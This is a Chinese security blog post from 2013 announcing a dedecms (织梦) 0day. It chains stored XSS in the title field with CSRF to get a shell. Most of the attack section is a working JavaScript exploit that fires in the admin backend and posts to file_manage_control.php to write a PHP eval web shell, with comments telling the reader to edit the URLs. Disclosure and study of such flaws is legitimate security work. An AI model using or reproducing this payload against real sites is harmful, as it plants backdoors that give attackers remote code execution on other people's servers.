dedecms(织梦)最新利用xss+csrf getshell 0day漏洞 附利用EXP

dedecms的漏洞很多,但是厂商都是不做修复。
之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修复,只是在title上加了addslashes。

20130604105123930

后台可触发xss

20130604105126930

利用js代码

var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;

getshell();
function getshell(){

var postStr="fmdo=edit&backurl=&activepath=%2Fdedecmsfullnew%2Fuploads%2Fuploads&filename=paxmac.php&str=%3C%3Fphp+eval%28%24_POST%5B%27cmd%27%5D%29%3B%3F%3E&B1=++%B1%A3+%B4%E6++";//url需要自己修改

xmlhttp.open("POST", "http://paxmac/dedecmsfullnew/uploads/dede/file_manage_control.php", true);//url需要自己修改
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", postStr.length);
xmlhttp.setRequestHeader("Connection", "close");
xmlhttp.send(postStr);

20130604105128190

触发前
20130604105129595
触发后
20130604105131290

作者:花开、若相惜

本文固定链接: https://www.unhonker.com/bug/1247.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2013年06月04日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: dedecms(织梦)最新利用xss+csrf getshell 0day漏洞 附利用EXP | 90' s Blog|关注网络信息安全

dedecms(织梦)最新利用xss+csrf getshell 0day漏洞 附利用EXP:目前有1 条留言

  1. 沙发
    网赚博客:

    😛 引用郭德纲语句:列害!真列害!~

    2013-06-06 11:00

发表评论

您必须 [ 登录 ] 才能发表留言!